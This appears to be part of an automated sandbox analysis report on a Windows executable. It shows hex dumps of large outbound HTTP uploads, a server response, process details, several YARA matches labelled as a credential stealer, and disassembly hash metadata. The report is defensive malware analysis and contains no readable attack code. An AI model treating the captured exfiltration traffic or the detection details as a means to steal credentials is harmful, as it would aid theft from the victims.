                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: cb 37 c4 c5 91 4b 85 9c ba c2 10 a9 b9 60 76 06 d2 7e 80 d7 ca ed b5 c6 ad 4b 71 5f f8 ce 04 98 3f 52 4c 94 dd fa 29 4b 7e ea 2b 7b 6d c7 e3 c2 2d ad be b0 57 fe 02 bf 75 25 93 7a be 09 a3 0c cd 47 6b 08 8b a5 52 e3 b2 12 25 e9 56 ae d0 c5 34 c9 84 b5 ec 85 f1 79 21 0d a7 96 a5 8e 5a 91 1c e5 29 7d 21 ca fd 7a 58 42 52 72 3b 53 39 06 16 4a f6 65 1a de 38 21 0d 26 e4 60 fd 70 7a a6 e0 5a 19 1f ec b3 55 e9 e5 e0 c7 6b 1d 54 04 df b0 6b 1a f6 f0 37 3e ae 1c 32 d6 8e 0a ae 05 90 d0 5d ba f0 d6 aa 89 24 7a 0e bb f6 3d 6f dd ad 45 89 b5 9b 1f ac 5e 58 d3 e8 85 68 79 b2 37 60 db ea a2 62 be 03 c1 8d 02 e3 27 17 0e bc eb d2 04 15 63 a9 0f 5f 7f 59 3f e6 f4 c0 9e eb 67 f3 da 3f 1b 62 cf f5 5c 98 7d f6 fe 02 92 40 c7 ff ac 81 bc 6f ba 0d ec 1a af aa aa 41 31 1d 9b
                                                                                        Data Ascii: 7K`v~Kq_?RL)K~+{m-Wu%zGkR%V4y!Z)}!zXBRr;S9Je8!&`pzZUkTk7>2]$z=oE^Xhy7`b'c_Y?g?b\}@oA1
                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: d2 70 60 1e 6e 1d 1d d5 74 56 e8 2e b5 20 bb 42 0a ec df 4f 51 14 a3 ac f1 81 23 7b d5 eb 83 f3 6f 29 77 89 0a ed c2 3c bf 9f 34 cf d2 1c 3e 2e 6d ee 9f 56 b2 f5 fb bf 42 6e e7 62 8c 72 6a e8 d0 cf f7 91 9c c2 a7 93 55 ef df 4a 05 08 79 72 d2 ab 6f d1 8d 2a 52 39 de 7d 61 b7 1f cd c9 0d 5c c9 a8 8e 19 9f b6 fb 22 c2 f1 4a 08 26 76 d1 c7 0e 85 24 a4 85 2b bb a2 c5 86 34 86 9a 7b f2 ca b0 12 e4 8d b5 5c 66 85 ad 5d be a7 d8 2f 15 6a 55 33 25 0d ad 03 eb fe 7b 7d 0f 26 4a 3f 49 c3 a1 6c dd 47 98 a6 a2 95 93 6f 25 17 c5 cf ef d2 5a 93 bc 94 48 3e 35 9c 37 5f 13 ca ad 50 e1 d0 0a 62 22 8c 52 dc 97 1f 59 50 4b b1 93 d2 f5 1e c6 a6 71 7b 1f 26 b4 87 ba 29 37 c5 92 90 0a 93 df 4c 02 3c 9c a4 0c 2f 5f d1 9b fe 25 31 f9 51 7b 93 5c 39 f9 f2 c9 37 b9 1b 15 1a 9b 8f
                                                                                        Data Ascii: p`ntV. BOQ#{o)w<4>.mVBnbrjUJyro*R9}a\"J&v$+4{\f]/jU3%{}&J?IlGo%ZH>57_Pb"RYPKq{&)7L</_%1Q{\97
                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: 0e 9b 2b 03 17 77 96 0e dd 22 d1 8d d3 26 73 16 f9 81 23 aa 16 44 d6 1f ef cf 56 07 0c bf 1c 7a ff 20 f3 76 81 69 41 9e 6d 72 9b 18 56 05 04 47 5c bb 6c 66 5e 38 57 94 ef b5 45 9f c5 68 c5 6b 86 37 c5 5a 43 70 d7 42 1e 73 77 70 46 8a dd 80 2a ab d3 52 42 18 f3 1b 8b 7f 98 89 22 73 4d c5 05 d5 87 55 af 7e 4b a4 ca 83 fd 18 27 28 a3 0a 52 d3 c2 cc df 36 f7 5f 7b d5 8d 28 dc b4 b8 0f 61 cf 0d 04 d8 53 3e a4 de 6c 3b b2 74 8c c8 f5 bb 6d c6 a8 2f 10 f3 94 c6 c2 9f 48 f7 cf cf 8a c3 c2 12 fc d6 b8 2e 6e 1c c8 a3 55 f5 8b 39 33 fd 43 64 a4 c0 64 e8 26 97 ab 62 fb eb ff 19 1e 7a 0b d3 66 ba 18 bd 01 4c 51 c2 37 74 c5 9f fe 6f 71 fb f6 9f 80 be e7 7e 4b 6e 49 f5 9e a9 4d e6 b9 2d ed 6f ef 12 de ae d2 0e 06 e7 44 e2 b9 eb a6 99 47 c4 f6 70 dd d4 f9 95 bd 5f c1 3d
                                                                                        Data Ascii: +w"&s#DVz viAmrVG\lf^8WEhk7ZCpBswpF*RB"sMU~K'(R6_{(aS>l;tm/H.nU93Cdd&bzfLQ7toq~KnIM-oDGp_=
                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: 82 49 10 69 54 18 e5 d6 0b 8e b9 46 7b 16 da ae 60 67 e2 81 bb 1b 84 cf 74 1d ce df f7 78 a3 e1 8c d6 92 fa 5c 49 b1 07 bf c0 9f 77 a4 4f 7e 47 1b a3 75 fd e7 1a ec 83 1e 49 25 09 8b fc de 9a a8 37 c1 f9 70 88 dc 74 63 cd 5c 4d d5 93 af 3b 68 ab e3 e5 1a bd b1 1d ae 78 fa e1 77 8a 25 7d dc b3 40 bc 75 ed ac a0 4d 9f 8a 5a 56 c6 f0 26 10 55 d1 b1 d2 ef 70 04 2f 6c d2 d9 27 0c 37 0f 8a 07 09 5c da ef 74 5e 98 bc e4 ca 3a bc 73 9d 08 fe 2a 78 a8 76 c3 41 23 19 41 02 bb 88 5f 4d 71 c4 cc aa b5 52 62 9c 6f 5d a0 e8 c4 29 ba 65 2b e6 f9 b1 b6 6f 12 d2 4c eb 0e d5 f8 d1 2d 4d 4f 0d 39 d4 64 2f 6d a2 2a b6 05 c7 64 75 3f 72 94 eb 57 97 15 d9 61 d3 4c cc 54 4e a5 b5 be 79 d8 14 61 d4 6d ef 09 4e 83 dc dd 75 0e ba 89 fd b6 59 0a bd 51 81 9c 3f 0d 62 26 52 0e ce e1
                                                                                        Data Ascii: IiTF{`gtx\IwO~GuI%7ptc\M;hxw%}@uMZV&Up/l'7\t^:s*xvA#A_MqRbo])e+oL-MO9d/m*du?rWaLTNyamNuYQ?b&R
                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: 23 60 a9 49 2b 4b 0f 33 80 c3 5f 6c b5 7b b5 b7 ff 88 79 e1 0d 68 c8 c1 50 d5 c6 e5 0b 81 0f 22 a8 2a 06 d3 83 9f cf 4d 34 d6 9d bd ec 00 48 0e c1 11 a1 eb 47 c6 b3 e8 09 0d e4 29 c1 56 fc 3b 09 1a 52 d3 7d b9 f3 4f 13 1b cd 3e 31 e4 c8 c3 93 b6 63 8a fd 1d 4f 43 8f 5e 33 bb c2 dd 31 ad cc 08 2f 7e f7 24 9e 82 8d c0 c4 ac 9b 38 2b b9 d4 45 84 74 ef b9 57 24 b8 ed ae 7b 02 7c ec b0 91 5e 81 e6 08 66 24 c0 77 fa 0c 3e a6 dd a9 62 c3 47 90 d4 17 9e ac 8d 3c 5b 25 29 b7 31 ee 5e 9d 3c 0d 33 a3 e1 31 00 6e 8e 2a 66 28 a6 0d 12 92 39 f7 a3 8b fe 37 3d d4 0c 84 ac 77 c8 d2 96 9f 20 89 8c bf 8c 5b aa 16 13 a9 0f d3 44 3d cf ad be 72 b3 44 1c 38 70 e4 07 a5 72 e8 07 45 04 b0 96 a5 c0 bf fc ac 8e 7f f8 fd f7 01 4a 5b ef 79 e0 46 4f 0b a7 09 30 3e a4 15 22 ca fe 39
                                                                                        Data Ascii: #`I+K3_l{yhP"*M4HG)V;R}O>1cOC^31/~$8+EtW${|^f$w>bG<[%)1^<31n*f(97=w [D=rD8prEJ[yFO0>"9
                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: b5 d1 66 e6 3f c9 4f 93 4e 77 06 19 3b aa 56 6a b4 4f 6d 2c 2c 4e 6c 7a 4f 70 16 39 3f 96 df ab 9e 8d 3a 77 fc 40 14 4d 49 bc da 8c 42 4f 34 b4 71 c5 88 b0 ff 1e c0 68 73 64 ef 62 dd 8d 3a 67 9f e8 73 d5 f4 7c 8e 0f 34 be f5 f3 b2 96 8d 30 3f 5a 2d a3 c2 03 e4 36 d9 c3 c7 ca a2 37 ac 07 15 cf 07 46 f8 0b ce 7e 91 c1 f2 df 3b 85 ed dc b7 97 91 a8 da 84 32 1d c3 dc 1b f8 22 3e 10 ce 57 98 1a 72 ae 6a 6e 16 cb b9 52 ab 39 06 2e a4 2d 72 8a d9 e8 31 5e a1 99 7b 14 5f 7c 8d 80 95 25 69 90 34 86 45 11 77 26 7a 79 8e ca b9 12 4e 1f 3b 37 48 51 54 22 51 14 33 14 db 93 6b 35 3f 6f 13 9c 3e 4b b3 b5 89 71 dd a5 32 6e f3 ed ab 9b d6 4f 53 3d 21 e2 94 da 4a 21 25 b1 91 bd b3 ca 45 36 74 cd e4 30 c5 47 90 54 ad 00 51 dd 66 91 32 6c 72 2e 8b d1 b9 4b 18 1b cf 75 4c 2d
                                                                                        Data Ascii: f?ONw;VjOm,,NlzOp9?:w@MIBO4qhsdb:gs|40?Z-67F~;2">WrjnR9.-r1^{_|%i4Ew&zyN;7HQT"Q3k5?o>Kq2nOS=!J!%E6t0GTQf2lr.KuL-
                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: 31 58 64 fe 36 ab a7 ae e6 9f f1 5c 3e c4 9d c0 c4 35 64 13 06 c8 b3 9f de e7 39 79 55 a8 04 15 ce 9d 37 61 25 78 5e f8 f7 04 08 7d 76 76 7c 92 87 0e 7e 84 16 2c 69 21 ea 89 51 ff 3e 83 d2 c1 8e c7 9d 6a 2d 11 80 67 0f 46 e9 a5 14 aa 3f dd 6e 63 9f ed 1e e3 dd 47 ab d8 14 a8 39 95 88 11 7b 34 f2 fd f6 9a 9d b8 8d 2c 27 e9 13 c0 8f 94 d0 7f 0e 8a f7 21 32 d3 e2 15 fe b9 9f f4 f7 f7 44 e7 c0 13 e0 73 f6 73 ed 23 f3 b6 36 fa 9c c9 ba 79 9d e3 7b e8 3c a0 62 ab 1a fe f6 61 28 ef f1 09 27 29 1d ad bf 56 88 0d df 53 98 4c be 55 4f b6 fd 17 ca 79 d6 0e 37 65 21 eb 8a 42 5e 64 88 c6 bd fb 7d 4b 7f e9 ad 80 77 e9 e9 aa 81 09 9a 1e dd 09 b6 02 9f 73 fc d8 31 68 71 2c 0a 35 4f dd b1 d9 1a 8b b9 92 86 b9 de cc 70 08 75 16 bc 79 60 cb 65 64 ec 58 22 97 85 38 cf 1f b7
                                                                                        Data Ascii: 1Xd6\>5d9yU7a%x^}vv|~,i!Q>j-gF?ncG9{4,'!2Dss#6y{<ba(')VSLUOy7e!B^d}Kws1hq,5Opuy`edX"8
                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: 20 81 30 d8 94 6d 14 6a 9c cc c9 d8 55 77 b3 2c 24 aa 41 99 aa 2e a8 ee bb f2 01 69 65 47 be 82 7d 93 a7 f6 4e 78 d0 5a d1 56 91 d5 cc bb db a9 ba 78 6b 32 df a1 d1 4f 2e 54 97 6a 58 be 89 a5 fb f1 97 c2 36 74 34 4d 46 45 2c fa bc f3 cb 8d 8c 02 e4 0c 5f 61 01 4a 1c 13 1b a1 80 e0 74 ce 64 c0 d4 09 ef cd 19 7d f8 9b 36 e1 b4 b4 1e f6 c2 1c 58 64 c8 d2 64 e0 54 34 02 2f 81 3c 28 8c 62 38 37 24 c4 c7 b9 a1 28 e1 41 49 bc 99 e7 89 bc eb da 23 82 05 1c fc 35 53 65 be 5a dd 49 ce cd 53 72 57 3e 60 52 af f1 80 b1 ab 2e 1c 21 84 89 d3 3d 38 d8 ef b0 a6 35 a5 e7 64 9d 56 77 43 55 6b 52 8d da 98 92 7c 4b 95 e9 3f 04 92 9a 7c 66 10 85 3d c5 45 36 03 c1 77 4f f6 be 88 e8 e5 72 f2 11 57 ba 71 46 13 e5 75 ef 7f 6b c0 ff 6c 76 cb 3f 80 17 6f 96 94 66 ed aa 4a 19 d0 36
                                                                                        Data Ascii: 0mjUw,$A.ieG}NxZVxk2O.TjX6t4MFE,_aJtd}6XddT4/<(b87$(AI#5SeZISrW>`R.!=85dVwCUkR|K?|f=E6wOrWqFuklv?ofJ6
                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: 94 79 cf 70 f7 e6 a5 36 82 ca 16 45 9b 0e 47 51 a2 7c 4a 80 8f bf be 34 c1 d4 a0 81 6c 7e 2e 50 db c4 48 4a 88 b7 fb 11 f1 12 78 44 92 94 f9 a5 88 14 c7 41 ac 98 d4 24 d4 0f 67 ed bd 71 ad f8 94 36 a8 f3 0a c5 7b e3 83 3b aa b7 8d fb ed 2f 41 4a dc 42 15 09 69 a2 8d 01 bf cf 10 4e 40 48 70 4c 3e 7b 59 90 06 cf 91 93 0f 35 88 87 72 6a ec c3 43 fa dc a9 5c f3 e9 73 96 4f 09 c2 e0 be a5 dc 1e e5 03 70 06 16 bd 73 87 2f 71 d1 28 59 5c ac fb 06 db 51 7c fa c8 53 60 8a f2 9b dd 2e b8 8e d2 36 d1 3b 99 b2 77 8d 8d dd cb 8d b8 22 fa a6 00 88 f0 3c 7a 19 86 60 93 de c2 a6 07 70 6f 7f 2e 5d 32 e0 2e 21 1e 5d cd 3a 67 54 47 38 12 c3 93 55 d1 6e 16 32 83 68 10 f2 30 32 31 7e 2d d8 91 7c e8 3b 55 62 e2 40 c3 af 62 e2 b5 2c 0d ab d1 b4 bb 72 ef b1 8c e3 3f 5b b0 79 55
                                                                                        Data Ascii: yp6EGQ|J4l~.PHJxDA$gq6{;/AJBiN@HpL>{Y5rjC\sOps/q(Y\Q|S`.6;w"<z`po.]2.!]:gTG8Un2h021~-|;Ub@b,r?[yU
                                                                                        2024-10-27 20:06:28 UTC1017INHTTP/1.1 200 OK
                                                                                        Date: Sun, 27 Oct 2024 20:06:28 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=g982hvchelvclb8mh7emvlj14n; expires=Thu, 20 Feb 2025 13:53:07 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NyzeGR0Jv88a959A6isYmorTIQZyAvOy9L5tiUiI3kVo2SbALrTHtM1JpBNSlpwmUszyjiYLEQ8t8YFqM4G2rfO29OM2y%2F3%2Fm8OBSiZl%2FadYNCzKL3sd7JSZoJU%2BOJo5IWrr"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d954e804b5b7d54-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1781&sent=221&recv=614&lost=0&retrans=0&sent_bytes=2839&recv_bytes=571554&delivery_rate=1648264&cwnd=250&unsent_bytes=0&cid=866e1ad3ac6ffa5a&ts=1999&x=0"


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:16:06:11
                                                                                        Start date:27/10/2024
                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x490000
                                                                                        File size:3'029'504 bytes
                                                                                        MD5 hash:05B1942E139D61A022F421BDD45A33BB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2208047140.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2182520412.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2207678543.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2182548936.0000000001067000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2194155395.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Non-executed Functions

                                                                                          Function 0106B5FE Relevance: 2.7, Instructions: 2705COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Offset: 01068000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_3_1068000_file.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 397e5b0f88ca9fb19c7b4e6f8135ebc2af383973eaf7d0fb9db9f5b11abb3c98
                                                                                          • Instruction ID: b582a2dd180c5f9214037e80c75ccf27d8097ad9efa4d89fac84a8330f38d626
                                                                                          • Opcode Fuzzy Hash: 397e5b0f88ca9fb19c7b4e6f8135ebc2af383973eaf7d0fb9db9f5b11abb3c98
                                                                                          • Instruction Fuzzy Hash: BAB239A284E3D15FE3538B349C666927FB1AF13224B0E46DBD0C4CF0A3D25D4A5AC766